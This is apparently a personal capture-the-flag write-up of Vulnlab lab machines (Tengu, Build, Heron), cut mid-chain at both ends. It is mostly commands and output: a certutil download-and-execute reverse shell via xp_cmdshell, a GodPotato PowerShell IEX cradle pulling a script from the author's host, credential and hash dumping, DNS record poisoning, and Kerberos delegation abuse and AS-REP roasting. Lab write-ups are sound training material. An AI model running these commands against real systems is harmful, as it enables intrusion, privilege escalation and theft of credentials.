[proxychains] Strict chain  ...  127.0.0.1:1080  ...  dc.tengu.vl:135  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  dc.tengu.vl:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  dc.tengu.vl:445  ...  OK
SMB         224.0.0.1       445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:tengu.vl) (signing:True) (SMBv1:False)
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  dc.tengu.vl:636  ...  OK
LDAPS       224.0.0.1       636    DC               [+] tengu.vl\NODERED$:d4210ee2db0c03aa3611c9ef8a4dbf49 
LDAPS       224.0.0.1       636    DC               [*] Getting GMSA Passwords
LDAPS       224.0.0.1       636    DC               Account: gMSA01$              NTLM: d4b65861e85773fba2035b31ebcacb37
LDAPS       224.0.0.1       636    DC               Account: gMSA02$              NTLM: 

 

we notice that we can delegate permissions as this account

┌──(puck㉿kali)-[~/vulnlab/tengu]
└─$ proxychains4 -q impacket-findDelegation 'tengu.vl/nodered$:@dc.tengu.vl' -hashes :d4210ee2db0c03aa3611c9ef8a4dbf49 
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

AccountName  AccountType                          DelegationType                      DelegationRightsTo         
-----------  -----------------------------------  ----------------------------------  --------------------------
gMSA01$      ms-DS-Group-Managed-Service-Account  Constrained w/ Protocol Transition  MSSQLSvc/SQL:1433          
gMSA01$      ms-DS-Group-Managed-Service-Account  Constrained w/ Protocol Transition  MSSQLSvc/sql.tengu.vl:1433 
gMSA01$      ms-DS-Group-Managed-Service-Account  Constrained w/ Protocol Transition  MSSQLSvc/sql.tengu.vl      
gMSA01$      ms-DS-Group-Managed-Service-Account  Constrained w/ Protocol Transition  MSSQLSvc/sql               

In bloodhound we will find a SQL_Admins group which contains two users, next we try to impersonate as one of these users

getting the ticket

.

┌──(puck㉿kali)-[~/vulnlab/tengu]
└─$ proxychains4 netexec ldap dc.tengu.vl -u 'NODERED$' -H d4210ee2db0c03aa3611c9ef8a4dbf49 --gmsa
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  dc.tengu.vl:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  dc.tengu.vl:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  dc.tengu.vl:636  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  dc.tengu.vl:135  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  dc.tengu.vl:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  dc.tengu.vl:445  ...  OK
SMB         224.0.0.1       445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:tengu.vl) (signing:True) (SMBv1:False)
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  dc.tengu.vl:636  ...  OK
LDAPS       224.0.0.1       636    DC               [+] tengu.vl\NODERED$:d4210ee2db0c03aa3611c9ef8a4dbf49 
LDAPS       224.0.0.1       636    DC               [*] Getting GMSA Passwords
LDAPS       224.0.0.1       636    DC               Account: gMSA01$              NTLM: d4b65861e85773fba2035b31ebcacb37
LDAPS       224.0.0.1       636    DC               Account: gMSA02$              NTLM: 
                                                                                                                             
┌──(puck㉿kali)-[~/vulnlab/tengu]
└─$ proxychains4 impacket-getST -spn 'MSSQLSvc/sql.tengu.vl' 'tengu.vl/GMSA01$@sql.tengu.vl' -hashes :d4b65861e85773fba2035b31ebcacb37 -dc-ip 10.10.185.21 -impersonate 't1_m.winters'
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.185.21:88  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.185.21:88  ...  OK
[*] Impersonating t1_m.winters
[*] Requesting S4U2self
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.185.21:88  ...  OK
[*] Requesting S4U2Proxy
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.185.21:88  ...  OK
[*] Saving ticket in t1_m.winters@MSSQLSvc_sql.tengu.vl@TENGU.VL.ccache
                                                                                                                             
┌──(puck㉿kali)-[~/vulnlab/tengu]

.

export KRB5CCNAME=t1_m.winters@MSSQLSvc_sql.tengu.vl@TENGU.VL.ccache

.

┌──(puck㉿kali)-[~/vulnlab/tengu]
└─$ proxychains4 -q impacket-mssqlclient -k sql.tengu.vl
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(SQL): Line 1: Changed database context to 'master'.
[*] INFO(SQL): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (160 3232) 
[!] Press help for extra shell commands
SQL (TENGU\t1_m.winters  dbo@master)> 

.

SQL (TENGU\t1_m.winters  dbo@master)> xp_cmdshell powershell "cd ..\..; mkdir temp; cd C:\temp; certutil.exe -urlcache -f http://10.8.2.138/rcat_10.8.2.138_443.exe rcat_10.8.2.138_443.exe; .\rcat_10.8.2.138_443.exe"

Catch the shell

┌──(puck㉿kali)-[~/vulnlab/tengu]
└─$ rlwrap nc -nlvp 443                                 
listening on [any] 443 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.185.22] 57071
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\temp> whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
PS C:\temp> 

.

godpotato on sql

PS C:\temp> ./god.exe -cmd "powershell.exe -nop -w hidden -ep bypass -c IEX(New-Object Net.WebClient).DownloadString('http://10.8.2.138:8080/rev.ps1');" 
./god.exe -cmd "powershell.exe -nop -w hidden -ep bypass -c IEX(New-Object Net.WebClient).DownloadString('http://10.8.2.138:8080/rev.ps1');" 
[*] CombaseModule: 0x140723188531200
[*] DispatchTable: 0x140723191118152
[*] UseProtseqFunction: 0x140723190413536
[*] UseProtseqFunctionParamCount: 6
[*] HookRPC
[*] Start PipeServer
[*] Trigger RPCSS
[*] CreateNamedPipe \\.\pipe\1d5f2595-2789-449b-affd-92979c14b4c6\pipe\epmapper
[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046
[*] DCOM obj IPID: 0000b802-095c-ffff-21e6-2d89c9d2f435
[*] DCOM obj OXID: 0x3beb0139e85dbe21
[*] DCOM obj OID: 0x3a821b5f15430353
[*] DCOM obj Flags: 0x281
[*] DCOM obj PublicRefs: 0x0
[*] Marshal Object bytes len: 100
[*] UnMarshal Object
[*] Pipe Connected!
[*] CurrentUser: NT AUTHORITY\NETWORK SERVICE
[*] CurrentsImpersonationLevel: Impersonation
[*] Start Search System Token
[*] PID : 908 Token:0x764  User: NT AUTHORITY\SYSTEM ImpersonationLevel: Impersonation
[*] Find System Token : True
[*] UnmarshalObject: 0x80070776
[*] CurrentUser: NT AUTHORITY\SYSTEM
[*] process start with pid 3888

catch the shell as nt-authority system and add ourself as local admin on sql

after 1st findind credsof domain admin TENGU\T0_c.fowler

Users may choose to save passwords in Windows by using an application or through the Credential Manager Control Panel applet. These credentials are stored on the hard disk drive and protected by using the Data Protection Application Programming Interface (DPAPI). Any program running as that user will be able to access credentials in this store.

PS C:\temp> wget http://10.8.2.138/sharp.exe -o sharp.exe
PS C:\temp> ./sharp.exe machinetriage /showall

  __                 _   _       _ ___ 
 (_  |_   _. ._ ._  | \ |_) /\  |_) |  
 __) | | (_| |  |_) |_/ |  /--\ |  _|_ 
                |                      
  v1.11.3                               


[*] Action: Machine DPAPI Credential, Vault, and Certificate Triage

[*] Secret  : DPAPI_SYSTEM
[*]    full: C9C2333305555B68C729FD0938EE5DB5D2C8B33540B36F0AC59918C608686152CB7F09F74A22F544
[*]    m/u : C9C2333305555B68C729FD0938EE5DB5D2C8B335 / 40B36F0AC59918C608686152CB7F09F74A22F544


[*] SYSTEM master key cache:

{474602b3-bbd6-4a0e-9c1d-52aa0cb0a039}:BE80161FB9DADBFBF9620483D8BC4EF0BDB4B6F5
{7710e63f-a791-438b-8dfa-33f25aef47a8}:6466F58B69E7B437DBCC89D4CAEFEF7E84944CE7
{1415bc56-749a-4f03-8a8e-9fb9733359ab}:FBED03CA71C0CACACF43D8EB3F6D03ADB9C3198B
{236fb638-82cd-4a22-b9e7-6745744da5bd}:CD9A01A3056FC877EE9B343AC3BE584AB7DF4D86


[*] Triaging System Credentials


Folder       : C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials

  CredFile           : 67B6C9FA0475C51A637428875C335AAD

    guidMasterKey    : {1415bc56-749a-4f03-8a8e-9fb9733359ab}
    size             : 576
    flags            : 0x20000000 (CRYPTPROTECT_SYSTEM)
    algHash/algCrypt : 32782 (CALG_SHA_512) / 26128 (CALG_AES_256)
    description      : Local Credential Data

    LastWritten      : 3/10/2024 2:49:34 PM
    TargetName       : Domain:batch=TaskScheduler:Task:{3C0BC8C6-D88D-450C-803D-6A412D858CF2}
    TargetAlias      : 
    Comment          : 
    UserName         : TENGU\T0_c.fowler
    Credential       : Unt<redacted>y25

 

.

 

PS C:\temp> net user puck Password123! /add
The command completed successfully.

PS C:\temp> net user

User accounts for \\

-------------------------------------------------------------------------------
Administrator            DefaultAccount           Guest                    
puck                     WDAGUtilityAccount       
The command completed with one or more errors.

PS C:\temp> net localgroup administrators puck /add
The command completed successfully.

next rdp to sql as puck

proxychains xfreerdp /u:puck /p:'Password123!' /w:1566 /h:968 /v:10.10.141.134:3389

 

from there start AD users and computers as user , and add a domain-admin puck , then mstsc to dc.tengu.vl

 

finaly do a hashdump

proxychains4 impacket-secretsdump 'tengu/puck:Password123!@dc.tengu.vl' > allhashes.txt

Because all Domain Admins are member of the group PROTECTED USERS@TENGU.VL , we can’t rdp in

 

 

That was super fun

vulnlab-build

vulnlab-build

an easy Linux box

.

rsync enum

└─$ rsync -av --list-only rsync://10.10.94.243
backups         backups
└─$ rsync -r rsync://10.10.94.243::backups

Dycrypting Jenkins pasword

┌──(puck㉿kali)-[~/vulnlab/build/jenkins_configuration/secrets]
└─$ python3 ../../decrypt.py master.key hudson.util.Secret ../jobs/build/config.xml
Git<redacted>!

Login to Gitea as user buildadm, and get RCE by editing the jenkinsfile

Start a netcat listener to catch the shell

┌──(puck㉿kali)-[~/vulnlab/build]
└─$ nc -nlvp 9001              
listening on [any] 9001 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.94.243] 38892
sh: 0: can't access tty; job control turned off
# pwd
/var/jenkins_home/workspace/build_dev_main
# cd /root
# ls
user.txt
# cat user.txt
VL{bf<redacted>c2}

run chisel server

┌──(puck㉿kali)-[~/vulnlab/build]
└─$ chisel server -p 8000 --reverse     
2024/08/09 10:26:20 server: Reverse tunnelling enabled
2024/08/09 10:26:20 server: Fingerprint pcPwgUx5V0JZX07cMUWbhSsjiQijd+PWFISAgaIp+vE=
2024/08/09 10:26:20 server: Listening on http://0.0.0.0:8000
2024/08/09 10:28:31 server: session#1: tun: proxy#R:127.0.0.1:1080=>socks: Listening

from docker

# pwd
/root/.ssh
# wget http://10.8.2.138/chisel
sh: 24: wget: not found
# curl http://10.8.2.138/chisel -o chisel
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 8506k  100 8506k    0     0  8620k      0 --:--:-- --:--:-- --:--:-- 8618k
# chmod +x chisel
# ls -la
total 8528
drwxr-xr-x 3 root root    4096 Aug  9 08:25 .
drwxr-xr-x 1 root root    4096 May  9 18:50 ..
lrwxrwxrwx 1 root root       9 May  1 14:37 .bash_history -> /dev/null
-r-------- 1 root root      35 May  1 17:37 .rhosts
drwxr-xr-x 2 root root    4096 May  1 16:05 .ssh
-rwxr-xr-x 1 root root 8711104 Aug  9 08:25 chisel
-rw------- 1 root root      37 May  1 14:29 user.txt
# ./chisel client 10.8.2.138:8000 R:socks
2024/08/09 08:28:30 client: Connecting to ws://10.8.2.138:8000
2024/08/09 08:28:30 client: Connected (Latency 20.395643ms)

.

nmap the host

┌──(puck㉿kali)-[~/vulnlab/build]
└─$ proxychains -q nmap 172.18.0.1
Starting Nmap 7.93 ( https://nmap.org ) at 2024-08-09 10:29 CEST
Stats: 0:00:14 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 24.50% done; ETC: 10:30 (0:00:46 remaining)
Stats: 0:00:36 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 62.10% done; ETC: 10:30 (0:00:23 remaining)
Nmap scan report for 172.18.0.1
Host is up (0.059s latency).
Not shown: 991 closed tcp ports (conn-refused)
PORT     STATE SERVICE
22/tcp   open  ssh
53/tcp   open  domain
512/tcp  open  exec
513/tcp  open  login
514/tcp  open  shell
873/tcp  open  rsync
3000/tcp open  ppp
3306/tcp open  mysql
8081/tcp open  blackice-icecap

Nmap done: 1 IP address (1 host up) scanned in 59.51 seconds
                                                                                                                              
┌──(puck㉿kali)-[~/vulnlab/build]

Do the mysql thing

┌──(puck㉿kali)-[~/vulnlab/build]
└─$ proxychains mysql -h 172.18.0.1 -u root
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  172.18.0.1:3306  ...  OK
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 34
Server version: 11.3.2-MariaDB-1:11.3.2+maria~ubu2204 mariadb.org binary distribution

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| performance_schema |
| powerdnsadmin      |
| sys                |
+--------------------+
5 rows in set (0.025 sec)

MariaDB [(none)]> use powerdnsadmin;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [powerdnsadmin]> select * from user;
+----+----------+--------------------------------------------------------------+-----------+----------+----------------+------------+---------+-----------+
| id | username | password                                                     | firstname | lastname | email          | otp_secret | role_id | confirmed |
+----+----------+--------------------------------------------------------------+-----------+----------+----------------+------------+---------+-----------+
|  1 | admin    | $2b$12$s1hK<redacted>Ze3Uw5Sc2.hsEq | admin     | admin    | admin@build.vl | NULL       |       1 |         0 |
+----+----------+--------------------------------------------------------------+-----------+----------+----------------+------------+---------+-----------+
1 row in set (0.023 sec)

MariaDB [powerdnsadmin]> select * from records;
+----+-----------+----------------------+------+------------------------------------------------------------------------------------------+------+------+----------+-----------+------+
| id | domain_id | name                 | type | content                                                                                  | ttl  | prio | disabled | ordername | auth |
+----+-----------+----------------------+------+------------------------------------------------------------------------------------------+------+------+----------+-----------+------+
|  8 |         1 | db.build.vl          | A    | 172.18.0.4                                                                               |   60 |    0 |        0 | NULL      |    1 |
|  9 |         1 | gitea.build.vl       | A    | 172.18.0.2                                                                               |   60 |    0 |        0 | NULL      |    1 |
| 10 |         1 | intern.build.vl      | A    | 172.18.0.1                                                                               |   60 |    0 |        0 | NULL      |    1 |
| 11 |         1 | jenkins.build.vl     | A    | 172.18.0.3                                                                               |   60 |    0 |        0 | NULL      |    1 |
| 12 |         1 | pdns-worker.build.vl | A    | 172.18.0.5                                                                               |   60 |    0 |        0 | NULL      |    1 |
| 13 |         1 | pdns.build.vl        | A    | 172.18.0.6                                                                               |   60 |    0 |        0 | NULL      |    1 |
| 14 |         1 | build.vl             | SOA  | a.misconfigured.dns.server.invalid hostmaster.build.vl 2024050201 10800 3600 604800 3600 | 1500 |    0 |        0 | NULL      |    1 |
+----+-----------+----------------------+------+------------------------------------------------------------------------------------------+------+------+----------+-----------+------+
7 rows in set (0.022 sec)

MariaDB [powerdnsadmin]> 
MariaDB [powerdnsadmin]> INSERT INTO records (id, domain_id, name, type, content, ttl, prio, disabled, ordername, auth)
    -> VALUES (7, 1, 'admin.build.vl', 'A', '10.8.2.138', 60, 0, 0, NULL,1);
Query OK, 1 row affected (0.023 sec)

MariaDB [powerdnsadmin]> 

.

┌──(puck㉿kali)-[~/vulnlab/build]
└─$ john admin.hash                                            
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 4096 for all loaded hashes
Will run 8 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Proceeding with wordlist:/usr/share/john/password.lst
wi<redacted>on          (?)     
1g 0:00:00:17 DONE 2/3 (2024-08-09 10:36) 0.05688g/s 40.95p/s 40.95c/s 40.95C/s roman..xavier
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

Install rsh client on kali box

┌──(puck㉿kali)-[~/vulnlab/build]
└─$ sudo apt-get install rsh-redone-client

rsh to build.vl machine as root

┌──(puck㉿kali)-[~/vulnlab/build]
└─$ rsh -l root 10.10.94.243
Welcome to Ubuntu 22.04.4 LTS (GNU/Linux 5.15.0-105-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

  System information as of Fri Aug  9 08:42:41 AM UTC 2024

  System load:                      0.64306640625
  Usage of /:                       62.7% of 9.75GB
  Memory usage:                     60%
  Swap usage:                       0%
  Processes:                        144
  Users logged in:                  0
  IPv4 address for br-f8002c9d7234: 172.18.0.1
  IPv4 address for docker0:         172.17.0.1
  IPv4 address for ens5:            10.10.94.243


Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status


The list of available updates is more than a week old.
To check for new updates run: sudo apt update


The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

root@build:~# pwd
/root
root@build:~# cat root.txt
VL{fe<redacted>b2}
root@build:~# 
                                                                                       

That was fun.

 

 

 

vulnlab-heron

vulnlab-heron

a medium chain

We find a note online with the initial pass to connect to the linux box : pentest:Heron123!

We start chisel on our kali box

┌──(puck㉿kali)-[~/vulnlab/heron]
└─$ chisel server -p 8000 --reverse 
2024/08/02 14:29:11 server: Reverse tunnelling enabled
2024/08/02 14:29:11 server: Fingerprint eyu7C2ldEm70kbrgTg7RsaykP56cSgqwu7GXCH17JyM=
2024/08/02 14:29:11 server: Listening on http://0.0.0.0:8000
2024/08/02 14:30:12 server: session#1: tun: proxy#R:127.0.0.1:1080=>socks: Listening

 

.

┌──(puck㉿kali)-[~/vulnlab/heron]
└─$ ssh pentest@10.10.148.86                                      
The authenticity of host '10.10.148.86 (10.10.148.86)' can't be established.
ED25519 key fingerprint is SHA256:7vUA9tMchnLRfzMzAtJD+Hwwr0nppIBRhctvevOQbm0.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.148.86' (ED25519) to the list of known hosts.
****************************************************
*              Welcome to Heron Corp               *
*  Unauthorized access to 'frajmp.heron.vl' is     *
*  forbidden and will be prosecuted by law.        *
****************************************************
(pentest@10.10.148.86) Password: 
Welcome to Ubuntu 22.04.4 LTS (GNU/Linux 5.15.0-107-generic x86_64)

 System information as of Fri Aug  2 12:24:16 PM UTC 2024

  System load:  0.0               Processes:             110
  Usage of /:   44.8% of 9.75GB   Users logged in:       0
  Memory usage: 23%               IPv4 address for ens5: 10.10.148.86
  Swap usage:   0%


Last login: Fri Jun  7 10:34:38 2024 from 10.8.0.101
pentest@frajmp:~$ who
pentest  pts/0        2024-08-02 12:24 (10.8.2.138)
pentest@frajmp:~$ cd /tmp
pentest@frajmp:/tmp$ wget http://10.8.2.138/chisel
--2024-08-02 12:28:23--  http://10.8.2.138/chisel
Connecting to 10.8.2.138:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 8711104 (8.3M) [application/octet-stream]
Saving to: ‘chisel’

chisel                100%[=======================>]   8.31M  6.88MB/s    in 1.2s    

2024-08-02 12:28:25 (6.88 MB/s) - ‘chisel’ saved [8711104/8711104]

pentest@frajmp:/tmp$ chmod +x chisel 
pentest@frajmp:/tmp$ ./chisel client 10.8.2.138:8000 R:socks
2024/08/02 12:30:11 client: Connecting to ws://10.8.2.138:8000
2024/08/02 12:30:12 client: Connected (Latency 20.482852ms)

We do a slow nmap scan over proxychains to the DC

┌──(puck㉿kali)-[~/vulnlab/heron]
└─$ proxychains nmap -sC -sV -oN herondc.nmap -p 80,445,389,53,135,3389,443,21 10.10.148.85      
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Starting Nmap 7.93 ( https://nmap.org ) at 2024-08-02 14:47 CEST
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.148.85:80  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.148.85:53  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.148.85:135  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.148.85:80  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.148.85:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.148.85:3389  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.148.85:443 <--socket error or timeout!
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.148.85:21 <--socket error or timeout!
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.148.85:389  ...  OK

Nmap scan report for 10.10.148.85
Host is up (0.062s latency).

PORT     STATE  SERVICE       VERSION
21/tcp   closed ftp
53/tcp   open   domain        Simple DNS Plus
80/tcp   open   http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: Heron Corp
|_http-server-header: Microsoft-IIS/10.0
135/tcp  open   msrpc         Microsoft Windows RPC
389/tcp  open   ldap          Microsoft Windows Active Directory LDAP (Domain: heron.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=mucdc.heron.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:mucdc.heron.vl
| Not valid before: 2024-06-01T15:29:52
|_Not valid after:  2025-06-01T15:29:52
|_ssl-date: TLS randomness does not represent time
443/tcp  closed https
445/tcp  open   microsoft-ds  Windows Server 2022 Standard 20348 microsoft-ds (workgroup: HERON)
3389/tcp open   ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2024-08-02T12:49:19+00:00; -2s from scanner time.
| rdp-ntlm-info: 
|   Target_Name: HERON
|   NetBIOS_Domain_Name: HERON
|   NetBIOS_Computer_Name: MUCDC
|   DNS_Domain_Name: heron.vl
|   DNS_Computer_Name: mucdc.heron.vl
|   DNS_Tree_Name: heron.vl
|   Product_Version: 10.0.20348
|_  System_Time: 2024-08-02T12:49:08+00:00
| ssl-cert: Subject: commonName=mucdc.heron.vl
| Not valid before: 2024-06-01T10:54:12
|_Not valid after:  2024-12-01T10:54:12
Service Info: Host: MUCDC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2024-08-02T12:49:12
|_  start_date: N/A
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb2-security-mode: 
|   311: 
|_    Message signing enabled and required
|_clock-skew: mean: 1h23m58s, deviation: 3h07m51s, median: -2s
| smb-os-discovery: 
|   OS: Windows Server 2022 Standard 20348 (Windows Server 2022 Standard 6.3)
|   Computer name: mucdc
|   NetBIOS computer name: MUCDC\x00
|   Domain name: heron.vl
|   Forest name: heron.vl
|   FQDN: mucdc.heron.vl
|_  System time: 2024-08-02T05:49:10-07:00

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 87.02 seconds
                                                                                      
┌──(puck㉿kali)-[~/vulnlab/heron]

.

on open port 80 we do a curl and find some usernames

┌──(puck㉿kali)-[~/vulnlab/heron]
└─$ proxychains4 curl http://10.10.148.85          
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.148.85:80  ...  OK
<!DOCTYPE html>
<html lang="en">
<body>
    <div class="container mt-5">
        <div class="text-center mb-4">
            <h1 class="display-4 text-white">Heron Corp</h1>
            <p class="lead text-white">Building the future of aerospace with precision and innovation.</p>


                        <h5 class="card-title">Wayne Wood</h5>
                        <p class="card-text">CEO</p>
                        <p>Email: wayne.wood@heron.vl</p>

                        <h5 class="card-title">Julian Pratt</h5>
                        <p class="card-text">Head of IT</p>
                        <p>Email: julian.pratt@heron.vl</p>

                        <i class="fas fa-user-tie fa-3x mb-3"></i>
                        <h5 class="card-title">Samuel Davies</h5>
                        <p class="card-text">Accounting</p>
                        <p>Email: samuel.davies@heron.vl</p>

</body>
</html>                                                                                      
┌──(puck㉿kali)-[~/vulnlab/heron]

We add to our /etc/hosts

10.10.148.85 mucdc.heron.vl heron.vl

Check for vuln ASREProasting users ( meaning AD account with option set : Do not require Kerberos preauthetication )

 

┌──(puck㉿kali)-[~/vulnlab/heron]
└─$ proxychains4 impacket-GetNPUsers heron.vl/'Guest' -dc-ip 10.10.148.85 -no-pass -request -usersfile users.txt      
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.148.85:88  ...  OK
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.148.85:88  ...  OK
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.148.85:88  ...  OK
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.148.85:88  ...  OK
[-] User svc-web-accounting-d doesn't have UF_DONT_REQUIRE_PREAUTH set
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.148.85:88  ...  OK
[-] User svc-web-accounting doesn't have UF_DONT_REQUIRE_PREAUTH set
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.148.85:88  ...  OK
[-] User wayne.wood doesn't have UF_DONT_REQUIRE_PREAUTH set
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.148.85:88  ...  OK
[-] User julian.pratt doesn't have UF_DONT_REQUIRE_PREAUTH set
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.148.85:88  ...  OK
$krb5asrep$23$samuel.davies@HERON.VL:5253809049f054f80bde543e1a85bd56$d72a41d4e4a470a8abb50153b4cf1b365c82e8d0be2c8b376559f2ceaeda11962b2ca2eb37e0fa3feae5cad46f8da6c4abc5d15c32a2b66651c5846f21755d587d8996a83f9e34bddd777f420f6da1061da0c33fd594c0432c9cf69ad6fb7c881858578ca9870cefffaf7c0a34f9deca4209cdf8a0e0a9b971a32e01744bc98c1f69d1dfd32d19e95124c7f9603adc9b139971aad3354ea4e2a1d1e23df6bb70fa57d9e967c98972058a1510e3b8f5ff0c55e45f35478fa0437e1119d2ad36e4d54d2695a6f545ea0a8f46b3b053a154f61d66fa8755d7d8676d71ec6f45aa40163b2101
[-] invalid principal syntax
                                                                                      
┌──(puck㉿kali)-[~/vulnlab/heron]

We crack this with hashcat , AS-REP Roasting uses hashcat mode 18200

┌──(puck㉿kali)-[~/vulnlab/heron]
└─$ hashcat -m 18200 -o cracked4.txt hash /usr/share/wordlists/rockyou.txt 
hashcat (v6.2.6) starting


Host memory required for this attack: 2 MB

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

                                                          
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 18200 (Kerberos 5, etype 23, AS-REP)
Hash.Target......: $krb5asrep$23$samuel.davies@HERON.VL:5253809049f054...3b2101
